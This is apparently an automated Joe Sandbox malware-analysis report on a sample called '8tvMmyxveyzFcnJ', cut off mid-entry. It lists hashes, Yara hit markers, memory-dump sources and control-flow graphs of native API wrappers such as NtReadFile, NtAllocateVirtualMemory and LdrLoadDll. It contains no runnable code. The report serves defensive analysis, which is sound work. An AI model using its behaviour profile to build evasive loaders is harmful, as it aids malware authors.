              • Opcode ID: b38acf0520ac0832f7c90cec9085b11b4027330eaf7878b765de6bf44cde4d00
              • Instruction ID: 7dd4db5edc0b8a52357312a906446fcfa37f7a525df93d7ca7f834b1a0a96efe
              • Opcode Fuzzy Hash: b38acf0520ac0832f7c90cec9085b11b4027330eaf7878b765de6bf44cde4d00
              • Instruction Fuzzy Hash: 5DD1E931920B5A9ACB11EF64D990A9DF7B1FF95300F10DB9AE00937615EB70AAC9CF41
              Memory Dump Source
              • Source File: 00000000.00000002.1703155717.00000000050C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_50c0000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a5137e40d1f2bb78d52288ab9bd848512f0b375c67f82ca89333f4a6fa2f35f8
              • Instruction ID: f5e5ec2330e7e222a230b51fdca46b35da738b2b0c86df3380d540cd850fae9b
              • Opcode Fuzzy Hash: a5137e40d1f2bb78d52288ab9bd848512f0b375c67f82ca89333f4a6fa2f35f8
              • Instruction Fuzzy Hash: D1A100B1D147499FCB14CFA9D884ADEBBB1FF89300F24826EE419AB251D7709885CF91
              Memory Dump Source
              • Source File: 00000000.00000002.1703155717.00000000050C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_50c0000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7c94320e7c7166d47883e2115fd0c5b591918a54c4fd1498281be4384cc2ee97
              • Instruction ID: 4b8406cc0c7e490a8985f5aaac011560371d2739247b4dc3823fa3e7064903d0
              • Opcode Fuzzy Hash: 7c94320e7c7166d47883e2115fd0c5b591918a54c4fd1498281be4384cc2ee97
              • Instruction Fuzzy Hash: 76C1C1B0821B468ED720CF65EC4A28D7FB1BBC5368B554209E1616F6E1DFB8144BCF4A

              Execution Graph

              Execution Coverage:1.6%
              Dynamic/Decrypted Code Coverage:2.7%
              Signature Coverage:5.8%
              Total number of Nodes:549
              Total number of Limit Nodes:66
              execution_graph: 549 nodes, 66 limit nodes; the rendered graph is not reproduced here. What the graph data records: the root node is 0x41f0c0; the named API nodes are LdrLoadDll, LdrInitializeThunk, NtCreateFile, NtReadFile, NtClose, NtAllocateVirtualMemory, RtlAllocateHeap, RtlFreeHeap, LookupPrivilegeValueW, PostThreadMessageW and ExitProcess. Every Nt*/Rtl* wrapper (0x41a360 NtCreateFile, 0x41a410 NtReadFile, 0x41a490 NtClose, 0x41a540 NtAllocateVirtualMemory, 0x41a630 RtlAllocateHeap, 0x41a670 RtlFreeHeap, 0x41a7d0 LookupPrivilegeValueW) first passes through 0x41af60 (LdrLoadDll) before the native call; 0x41ad70 calls 0x41ac30 (LdrLoadDll) about forty times in sequence; the LdrInitializeThunk nodes sit outside the image at 0x13f2xxx (0x13f2c0a, 0x13f2c70, 0x13f2ca0, 0x13f2d10, 0x13f2d30, 0x13f2dd0, 0x13f2df0, 0x13f2e80, 0x13f2ea0, 0x13f2f30, 0x13f2f90, 0x13f2fb0, 0x13f2ad0).

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 0 41a40a-41a459 call 41af60 NtReadFile
              APIs
              • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1754363752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_400000_8tvMmyxveyzFcnJ.jbxd
              Yara matches
              Similarity
              • API ID: FileRead
              • String ID: 1JA$rMA$rMA
              • API String ID: 2738559852-782607585
              • Opcode ID: da9dca5e340969b0e19fdfb2769eff91311bbc90f038b01d9c4a8653d3c13b5c
              • Instruction ID: d9f3efcc6fba735fe827f6fd57d323a72c1d16cfd7affead5f3e42ca52de0d7b
              • Opcode Fuzzy Hash: da9dca5e340969b0e19fdfb2769eff91311bbc90f038b01d9c4a8653d3c13b5c
              • Instruction Fuzzy Hash: 81F0A9B2200208AFCB14DF99DC81DEB77A9EF8C754F158249BA1DA7241D634E951CBE4

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 3 41a410-41a426 4 41a42c-41a459 NtReadFile 3->4 5 41a427 call 41af60 3->5 5->4
              APIs
              • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1754363752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_400000_8tvMmyxveyzFcnJ.jbxd
              Yara matches
              Similarity
              • API ID: FileRead
              • String ID: 1JA$rMA$rMA
              • API String ID: 2738559852-782607585
              • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
              • Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
              • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
              • Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 234 40acf0-40ad0c 235 40ad14-40ad19 234->235 236 40ad0f call 41cc50 234->236 237 40ad1b-40ad1e 235->237 238 40ad1f-40ad2d call 41d070 235->238 236->235 241 40ad3d-40ad4e call 41b4a0 238->241 242 40ad2f-40ad3a call 41d2f0 238->242 247 40ad50-40ad64 LdrLoadDll 241->247 248 40ad67-40ad6a 241->248 242->241 247->248
              APIs
              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
              Memory Dump Source
              • Source File: 00000003.00000002.1754363752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_400000_8tvMmyxveyzFcnJ.jbxd
              Yara matches
              Similarity
              • API ID: Load
              • String ID:
              • API String ID: 2234796835-0
              • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
              • Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
              • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
              • Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 249 41a35f-41a3b1 call 41af60 NtCreateFile
              APIs
              • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
              Memory Dump Source
              • Source File: 00000003.00000002.1754363752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_400000_8tvMmyxveyzFcnJ.jbxd
              Yara matches
              Similarity
              • API ID: CreateFile
              • String ID:
              • API String ID: 823142352-0
              • Opcode ID: 4049a3bf42b563136c493a9652f10bd73eeb14a36f32a88b936d0f677cb3cfab
              • Instruction ID: b0ea305ca0179594be26f88849999d72c403b9e7c25092e2012cfb502ab0554f
              • Opcode Fuzzy Hash: 4049a3bf42b563136c493a9652f10bd73eeb14a36f32a88b936d0f677cb3cfab
              • Instruction Fuzzy Hash: FEF0BDB2205208AFCB48CF88DC85EEB37EDAF8C754F158248BA0DD7241D630E8518BA4

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 252 41a360-41a376 253 41a37c-41a3b1 NtCreateFile 252->253 254 41a377 call 41af60 252->254 254->253
              APIs
              • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
              Memory Dump Source
              • Source File: 00000003.00000002.1754363752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_400000_8tvMmyxveyzFcnJ.jbxd
              Yara matches
              Similarity
              • API ID: CreateFile
              • String ID:
              • API String ID: 823142352-0
              • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
              • Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
              • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
              • Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 255 41a53a-41a556 256 41a55c-41a57d NtAllocateVirtualMemory 255->256 257 41a557 call 41af60 255->257 257->256
              APIs
              • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
              Memory Dump Source
              • Source File: 00000003.00000002.1754363752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_400000_8tvMmyxveyzFcnJ.jbxd
              Yara matches
              Similarity
              • API ID: AllocateMemoryVirtual
              • String ID:
              • API String ID: 2167126740-0
              • Opcode ID: 5c48dbb4db2addaba0cea100d782742fbf10658976ab14c12c095cf639fd573d
              • Instruction ID: 82a71e247ab1e51189810cadd825386097fb7f7a34c392186ae9d553c9c6a0ab
              • Opcode Fuzzy Hash: 5c48dbb4db2addaba0cea100d782742fbf10658976ab14c12c095cf639fd573d
              • Instruction Fuzzy Hash: 5EF058B2200208AFDB14DF99CC81EEB77B9EF88354F158558FE4DA7241C630E821CBA0

              Control-flow Graph
              • Blocks: 258 41a540-41a57d (call 41af60, NtAllocateVirtualMemory)
              • Edges: none (single block)
              APIs
              • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
              Memory Dump Source
              • Source File: 00000003.00000002.1754363752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_400000_8tvMmyxveyzFcnJ.jbxd
              Yara matches
              Similarity
              • API ID: AllocateMemoryVirtual
              • String ID:
              • API String ID: 2167126740-0
              • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
              • Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
              • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
              • Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4
              APIs
              • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
              Memory Dump Source
              • Source File: 00000003.00000002.1754363752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_400000_8tvMmyxveyzFcnJ.jbxd
              Yara matches
              Similarity
              • API ID: Close
              • String ID:
              • API String ID: 3535843008-0
              • Opcode ID: cd4cd9b3938568fcee11681b6c846c76ac88f6db5cd9fb966552161bd42c3cf2
              • Instruction ID: eea82b31076ec0d138028a2a42476fb395de81841b37d259ef3cf74a12bfe863
              • Opcode Fuzzy Hash: cd4cd9b3938568fcee11681b6c846c76ac88f6db5cd9fb966552161bd42c3cf2
              • Instruction Fuzzy Hash: 93E086712001147FD711DFA8DC45EE73B6CEF88730F244559B91D97291D130E6118790
              APIs
              • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
              Memory Dump Source
              • Source File: 00000003.00000002.1754363752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_400000_8tvMmyxveyzFcnJ.jbxd
              Yara matches
              Similarity
              • API ID: Close
              • String ID:
              • API String ID: 3535843008-0
              • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
              • Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
              • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
              • Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0
              APIs
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: d208d12b4b75d97e9a929b357e383fee6bb45a784ed539da1641cc64d77f1b62
              • Instruction ID: b04462930b64444472992489cf7867f9500ee920909b320a7d27ae53cfb9f1af
              • Opcode Fuzzy Hash: d208d12b4b75d97e9a929b357e383fee6bb45a784ed539da1641cc64d77f1b62
              • Instruction Fuzzy Hash: 4990026161280143410671594514616400A97F0201B55C032E10145D5DC63589D16625
              APIs
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 9a4d2e2a829355d9e8d2ea84772a699bd1bad711a484aa17fce7e11ee2075261
              • Instruction ID: 9dd3d6852a32a5dc1681b0446b91f4ea8ada641ffe62a0c62f8b351ad2be71a0
              • Opcode Fuzzy Hash: 9a4d2e2a829355d9e8d2ea84772a699bd1bad711a484aa17fce7e11ee2075261
              • Instruction Fuzzy Hash: 2E90023161180942D1817159450464A000597E1301F95C026A0025699DCB358B997BA1
              APIs
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: b2218faa09ebe26234943c544ffabbafc8a17aee03803644d226be50c7dc1afe
              • Instruction ID: b94ff99e4ae1cf3893ccb3da1d07755c33cba2f4c002eceb066e6a52469c29f0
              • Opcode Fuzzy Hash: b2218faa09ebe26234943c544ffabbafc8a17aee03803644d226be50c7dc1afe
              • Instruction Fuzzy Hash: 4F900225621801430106B5590704507004697E5351355C032F1015595CD73189A15621
              APIs
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 2a095cb38ca433d3508dee535f10912eff9a6ab77af6e71cf74236239f02510d
              • Instruction ID: 1a73d034470c272ec62f72be95b3df8f1b9e506cb41fd57f39028bdb9bc80c12
              • Opcode Fuzzy Hash: 2a095cb38ca433d3508dee535f10912eff9a6ab77af6e71cf74236239f02510d
              • Instruction Fuzzy Hash: 1990022171180143D141715955186064005E7F1301F55D022E0414599CDA3589965722
              APIs
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 0a3e9d628daddd4a5c7b3c783b0aee48db092d28d1c6cadd91bb84d07f7615c6
              • Instruction ID: 77900da0c02f8d5bed2c7325aef9f96b2ca3627c205a286beeed864687099072
              • Opcode Fuzzy Hash: 0a3e9d628daddd4a5c7b3c783b0aee48db092d28d1c6cadd91bb84d07f7615c6
              • Instruction Fuzzy Hash: C990022962380142D1817159550860A000597E1202F95D426A001559DCCA3589A95721
              APIs
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 56a08a3936f89341aba5a2d687c57eb08a992b10046c0bbf8e0dd95a94d0ec11
              • Instruction ID: c1f91a5473c388d4e295ec2b9208c2d6c648bfc0214ac60bfb8534ea61156d2d
              • Opcode Fuzzy Hash: 56a08a3936f89341aba5a2d687c57eb08a992b10046c0bbf8e0dd95a94d0ec11
              • Instruction Fuzzy Hash: 0F90023161180553D11271594604707000997E0241F95C423A042459DDD7768A92A621
              APIs
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 72cde6163dae4f3f70a6ba2d8bd77392838c8edf73eeb2587db24ab7ade9bdcb
              • Instruction ID: ae56a6fc7267ee771b6fd9efa93172b67a0dd7ace343ebfed6081d6e1a7f7561
              • Opcode Fuzzy Hash: 72cde6163dae4f3f70a6ba2d8bd77392838c8edf73eeb2587db24ab7ade9bdcb
              • Instruction Fuzzy Hash: D9900221652842925546B15945045074006A7F0241795C023A1414995CC6369996DB21
              APIs
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 26abf816c0bd0d527bd554ced65dc960d12b95e29249d2c296c8777527dcfe12
              • Instruction ID: 588fe6cd9f00427923295f1e6f00f600b68916a487e5e663b196aed6db70798d
              • Opcode Fuzzy Hash: 26abf816c0bd0d527bd554ced65dc960d12b95e29249d2c296c8777527dcfe12
              • Instruction Fuzzy Hash: 8390023161188942D1117159850474A000597E0301F59C422A442469DDC7B589D17621
              APIs
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 629aba4f87020cc04c501b4c1f5e0876edfc5168b70f85239aba709ecbce8861
              • Instruction ID: f3e51471236954a8844cd96be8afc5d239b5dbb3e72e5230e4107833c4f73e97
              • Opcode Fuzzy Hash: 629aba4f87020cc04c501b4c1f5e0876edfc5168b70f85239aba709ecbce8861
              • Instruction Fuzzy Hash: E590023161180542D10175995508646000597F0301F55D022A502459AEC77589D16631
              APIs
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: ad21fef94bac7f0e79fb4939eb4f24c05dbbbdd16aa91b6548710ab53a1d94a6
              • Instruction ID: fb92b34038529c54098faeb211e5e05ff32b140b6076f0cb61388313516acff6
              • Opcode Fuzzy Hash: ad21fef94bac7f0e79fb4939eb4f24c05dbbbdd16aa91b6548710ab53a1d94a6
              • Instruction Fuzzy Hash: 3890026175180582D10171594514B060005D7F1301F55C026E1064599DC739CD926626
              APIs
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 828b5acacdfa36c9fbb949f903d4449613c81e7b35289ee2dd40660ede63364b
              • Instruction ID: c2b5fc2d5a20dbc90f76d067d55e38de03c518b919734ca72a028cb1cf4b5cb0
              • Opcode Fuzzy Hash: 828b5acacdfa36c9fbb949f903d4449613c81e7b35289ee2dd40660ede63364b
              • Instruction Fuzzy Hash: E0900221A11801824141716989449064005BBF1211755C132A0998595DC67989A55B65
              APIs
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 77d5fdf32d889c85e7123603595057a7bef3e6d3636ca9e9617c98da67963b6d
              • Instruction ID: a7c696121c9ce28c566e8f2a823ff29dd7cadda9083a310d9dc51ad92fc3f755
              • Opcode Fuzzy Hash: 77d5fdf32d889c85e7123603595057a7bef3e6d3636ca9e9617c98da67963b6d
              • Instruction Fuzzy Hash: 2E900231611C0542D1017159491470B000597E0302F55C022A116459ADC73589916A71
              APIs
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: cc1187fdac668db936ee0ec9bca2f1f97f7f15f4d3c2bcbcff0047bf87a88e21
              • Instruction ID: b759bf00f82472ca03463fdc274b13b8128b21af2243890893ae4fbf17d392d6
              • Opcode Fuzzy Hash: cc1187fdac668db936ee0ec9bca2f1f97f7f15f4d3c2bcbcff0047bf87a88e21
              • Instruction Fuzzy Hash: 4B900221621C0182D20175694D14B07000597E0303F55C126A0154599CCA3589A15A21
              APIs
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 6baadb38c815acfd41156cf3241b88e2f11f97e86d70f2d39bdd9235a0e3aa97
              • Instruction ID: d60d58dc601e7c5d857c73e2f9e4762801d51b0af1150357633be40b7a96df7b
              • Opcode Fuzzy Hash: 6baadb38c815acfd41156cf3241b88e2f11f97e86d70f2d39bdd9235a0e3aa97
              • Instruction Fuzzy Hash: 0B90027161180542D14171594504746000597E0301F55C022A5064599EC7798ED56B65
              APIs
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 2c532ceadafe775573fa0acf4455da864b0a68356b5ef2935d6e608f65ffe58a
              • Instruction ID: 5bda666a619403412e6fef4579ff928c7c6938de5f9018f84788daef187ef303
              • Opcode Fuzzy Hash: 2c532ceadafe775573fa0acf4455da864b0a68356b5ef2935d6e608f65ffe58a
              • Instruction Fuzzy Hash: 2D900221A1180642D10271594504616000A97E0241F95C033A102459AECB358AD2A631
              Memory Dump Source
              • Source File: 00000003.00000002.1754363752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_400000_8tvMmyxveyzFcnJ.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
              • Instruction ID: 0b46cc9625fd597f0f1293e0fe630cc8c1f9f1e3f005c30533d49d025d22dd75
              • Opcode Fuzzy Hash: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
              • Instruction Fuzzy Hash: 97210AB2D4020857CB25D674AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5

              Control-flow Graph
              • Blocks: 6 41a630-41a661 (call 41af60, RtlAllocateHeap)
              • Edges: none (single block)
              APIs
              • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1754363752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_400000_8tvMmyxveyzFcnJ.jbxd
              Yara matches
              Similarity
              • API ID: AllocateHeap
              • String ID: 6EA
              • API String ID: 1279760036-1400015478
              • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
              • Instruction ID: b63900df46c74d48569035b2bcc9be016157083d4ef88d1b541c797289a4eec1
              • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
              • Instruction Fuzzy Hash: 46E012B1200208ABDB14EF99CC41EA777ACEF88664F158559BA085B242C630F9118AB0

              Control-flow Graph
              • Blocks: 204 408308-40835a (call 41be60, call 41ca00, call 40acf0, call 414e50); 213 40835c-40836e (PostThreadMessageW); 214 40838e-408392; 215 408370-40838a (call 40a480); 216 40838d
              • Edges: 204->213, 204->214, 213->215, 213->216, 215->216, 216->214
              APIs
              • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
              Memory Dump Source
              • Source File: 00000003.00000002.1754363752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_400000_8tvMmyxveyzFcnJ.jbxd
              Yara matches
              Similarity
              • API ID: MessagePostThread
              • String ID:
              • API String ID: 1836367815-0
              • Opcode ID: ad6e92db074ec06a213529fc4cf0a505365d433dce961343fd20306699894531
              • Instruction ID: 5992b9be4baf2c7b566ef3647458cd36ce21ba925a148f2579bd006564dde71f
              • Opcode Fuzzy Hash: ad6e92db074ec06a213529fc4cf0a505365d433dce961343fd20306699894531
              • Instruction Fuzzy Hash: 9601D871A9032877E721A6959C43FFE7B6C9B44F94F04011DFF04BA1C2EAE8690543EA

              Control-flow Graph
              • Blocks: 219 408310-40831f; 220 408328-40835a (call 41ca00, call 40acf0, call 414e50); 221 408323 (call 41be60); 228 40835c-40836e (PostThreadMessageW); 229 40838e-408392; 230 408370-40838a (call 40a480); 231 40838d
              • Edges: 219->220, 219->221, 220->228, 220->229, 221->220, 228->230, 228->231, 230->231, 231->229
              APIs
              • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
              Memory Dump Source
              • Source File: 00000003.00000002.1754363752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_400000_8tvMmyxveyzFcnJ.jbxd
              Yara matches
              Similarity
              • API ID: MessagePostThread
              • String ID:
              • API String ID: 1836367815-0
              • Opcode ID: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
              • Instruction ID: fe648ddaccc693dff6b318d6e20673cc1517f8ca6da234ac2c2ad493b9bfa733
              • Opcode Fuzzy Hash: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
              • Instruction Fuzzy Hash: FF018431A8032C76E721A6959C43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA

              Control-flow Graph
              • Blocks: 261 41a663-41a687 (call 41af60); 263 41a68c-41a6a1 (RtlFreeHeap)
              • Edges: 261->263
              APIs
